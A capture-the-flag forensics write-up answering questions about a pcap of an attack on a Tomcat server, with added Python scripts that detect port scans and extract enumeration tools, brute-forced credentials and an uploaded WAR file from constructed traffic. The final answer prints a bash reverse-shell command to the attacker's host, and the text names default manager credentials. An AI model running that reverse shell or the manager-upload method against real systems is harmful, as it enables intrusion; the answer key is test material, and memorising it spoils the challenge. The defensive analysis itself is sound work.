Category: Materials
Retired
Due date: May 28, 2024 05:25 AM
Q 1

Given the suspicious activity detected on the web server, the pcap analysis shows a series of requests across various ports, suggesting a potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?
Ans: 14.0.0.120
(Screenshot: port scan)

Q 2

Based on the identified IP address associated with the attacker, can you ascertain the city from which the attacker's activities originated?
Ans: Guangzhou

Q 3

From the pcap analysis, multiple open ports were detected as a result of the attacker's scan. Which of these ports provides access to the web server admin panel?
Ans: 8080
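The two facts behind Q1 and Q3 (who scanned, and which probed ports answered) fall straight out of the TCP handshake flags, so here is the logic as a runnable script. This is an added example, not code from the challenge or its authors: PACKETS is a constructed list of handshake records shaped like the pcap (14.0.0.120 is the scanner named in Q1; 10.0.0.112 as the web server is an assumption taken from the Q8 note). On a real capture you would build the same tuples from `tshark -T fields` or scapy instead.

```python
"""Port-scan triage over TCP handshake records (added example, constructed data)."""
from collections import defaultdict

SCANNER = "14.0.0.120"
SERVER = "10.0.0.112"          # assumption: the web server from the Q8 note
SYN, SYNACK, RSTACK = "S", "SA", "RA"


def _build_sample():
    """Constructed sample: (time, src, dst, sport, dport, tcp_flags)."""
    pkts = []
    probed = [21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3306, 8080, 8443]
    listening = {22, 80, 8080}         # ports the server answers on
    t = 0.0
    for i, port in enumerate(probed):
        t += 0.01
        sport = 40000 + i
        pkts.append((t, SCANNER, SERVER, sport, port, SYN))
        reply = SYNACK if port in listening else RSTACK
        pkts.append((t + 0.001, SERVER, SCANNER, port, sport, reply))
    # one ordinary client opening a single connection to the web port
    pkts.append((10.0, "10.0.0.50", SERVER, 51000, 80, SYN))
    pkts.append((10.001, SERVER, "10.0.0.50", 80, 51000, SYNACK))
    return pkts


PACKETS = _build_sample()


def find_scanners(packets, min_ports=10, window=5.0):
    """Sources that sent SYNs to >= min_ports distinct ports within `window`
    seconds.  Returns [(src, max_distinct_ports)] sorted by that count."""
    syns = defaultdict(list)
    for t, src, dst, sport, dport, flags in packets:
        if flags == SYN:
            syns[src].append((t, dport))
    hits = []
    for src, events in syns.items():
        events.sort()
        best, lo = 0, 0
        for hi in range(len(events)):
            while events[hi][0] - events[lo][0] > window:
                lo += 1
            best = max(best, len({p for _, p in events[lo:hi + 1]}))
        if best >= min_ports:
            hits.append((src, best))
    return sorted(hits, key=lambda h: -h[1])


def open_ports(packets, scanner, target):
    """Target ports that answered one of scanner's SYNs with SYN-ACK.
    RST-ACK replies (closed ports) and unanswered SYNs are ignored."""
    probes = set()
    opened = set()
    for t, src, dst, sport, dport, flags in packets:
        if src == scanner and dst == target and flags == SYN:
            probes.add((sport, dport))
        elif (src == target and dst == scanner and flags == SYNACK
              and (dport, sport) in probes):
            opened.add(sport)
    return opened


if __name__ == "__main__":
    for src, n in find_scanners(PACKETS):
        print(f"{src}: SYNs to {n} distinct ports inside one {5.0:.0f} s window")
        print("  open on target:", sorted(open_ports(PACKETS, src, SERVER)))
```

In Wireshark the same two steps are the display filter `tcp.flags.syn==1 && tcp.flags.ack==0` (count distinct destination ports per source in Statistics > Conversations) followed by `tcp.flags.syn==1 && tcp.flags.ack==1` to list the ports that replied. Counting completed connections instead of SYNs misses half-open scans, which is why the script keys on the SYN alone.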

Q 4

Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?
Ans: gobuster

Q 5

Subsequent to their efforts to enumerate directories on our web server, the attacker made numerous requests trying to identify administrative interfaces. Which specific directory associated with the admin panel was the attacker able to uncover?
Ans: /manager

Q 6

Upon accessing the admin panel, the attacker made attempts to brute-force the login credentials. From the data, can you identify the correct username and password combination that the attacker successfully used for authorization?
Ans: admin:tomcat

Q 7

Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?
Ans: JXQOZY.war
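Q4 through Q7 are all answered from the HTTP layer of the same capture: the User-Agent gives away the enumeration tool, the non-404 responses give the discovered path, the Basic-auth header that finally earns a 200 gives the credentials, and the multipart upload body gives the WAR name. The script below does those four extractions over TRANSACTIONS, a constructed list of (raw request, response status) pairs shaped like the traffic this writeup describes against the Tomcat manager on 10.0.0.112:8080 (host assumed from the Q8 note). It is an added example, not code from the challenge or its authors; on a real pcap the same pairs come from tshark's `http.request`/`http.response` fields or Follow TCP Stream.

```python
"""HTTP triage: enumeration tool, found path, brute-forced creds, uploaded WAR
(added example, constructed data)."""
import base64
import re

SERVER = "10.0.0.112:8080"       # assumption: Tomcat host from the Q8 note
ENUM_TOOLS = ("gobuster", "dirb", "dirbuster", "ffuf", "wfuzz", "nikto")


def _req(method, path, headers, body=""):
    head = "\r\n".join([f"{method} {path} HTTP/1.1", f"Host: {SERVER}"]
                       + [f"{k}: {v}" for k, v in headers.items()])
    return head + "\r\n\r\n" + body


def _basic(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


# Constructed multipart body in the shape Tomcat's manager upload form sends.
_WAR = ("--xyz\r\nContent-Disposition: form-data; name=\"deployWar\"; "
        "filename=\"JXQOZY.war\"\r\nContent-Type: application/octet-stream"
        "\r\n\r\nPK..constructed-war-bytes..\r\n--xyz--\r\n")

UA_SCAN = {"User-Agent": "gobuster/3.6"}
UA_PY = {"User-Agent": "python-requests/2.31"}
TRANSACTIONS = [
    (_req("GET", "/admin", UA_SCAN), 404),
    (_req("GET", "/backup", UA_SCAN), 404),
    (_req("GET", "/manager", UA_SCAN), 302),
    (_req("GET", "/manager/html", {**UA_PY, "Authorization": _basic("admin", "admin")}), 401),
    (_req("GET", "/manager/html", {**UA_PY, "Authorization": _basic("tomcat", "s3cret")}), 401),
    (_req("GET", "/manager/html", {**UA_PY, "Authorization": _basic("admin", "tomcat")}), 200),
    (_req("POST", "/manager/html/upload",
          {**UA_PY, "Authorization": _basic("admin", "tomcat"),
           "Content-Type": "multipart/form-data; boundary=xyz"}, _WAR), 200),
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def _ua(req):
    return req["headers"].get("user-agent", "").lower()


def enumeration_tools(txns):
    """Tool names that appear in User-Agent strings."""
    return sorted({tool for raw, _ in txns for tool in ENUM_TOOLS
                   if tool in _ua(parse_request(raw))})


def discovered_paths(txns):
    """Paths an enumeration tool requested that did not come back 404."""
    found = {}
    for raw, status in txns:
        req = parse_request(raw)
        if status != 404 and any(t in _ua(req) for t in ENUM_TOOLS):
            found[req["path"]] = status
    return found


def basic_auth_attempts(txns):
    """[(user:password, status)] for every request carrying Basic auth."""
    attempts = []
    for raw, status in txns:
        auth = parse_request(raw)["headers"].get("authorization", "")
        if auth.lower().startswith("basic "):
            creds = base64.b64decode(auth.split(None, 1)[1]).decode("utf-8", "replace")
            attempts.append((creds, status))
    return attempts


def successful_logins(txns):
    """Credentials whose request was answered 200 rather than 401."""
    return sorted({c for c, s in basic_auth_attempts(txns) if s == 200})


def uploaded_files(txns):
    """Filenames from multipart POST bodies (the manager deploys the deployWar field)."""
    names = []
    for raw, _ in txns:
        req = parse_request(raw)
        if req["method"] == "POST" and "multipart/form-data" in req["headers"].get("content-type", ""):
            names += re.findall(r'filename="([^"]+)"', req["body"])
    return names
```

Two checks worth doing by hand after this: the credential pair is the one whose response is a 200 (every 401 before it is a failed guess), and a WAR deployed through the manager is typically exploded into its own context, so a later `GET /JXQOZY/` from the attacker is the request that actually fires the reverse shell.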

Q 8

Upon successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?
Note: install tomcat on 10.0.0.112
Ans: /bin/bash -c 'bash -i >&/dev/tcp/14.0.0.120/443 0>&1'

Reference

Sharklocks - Meerkat2024 資安大會 (Cybersecurity Conference) cyber arena writeup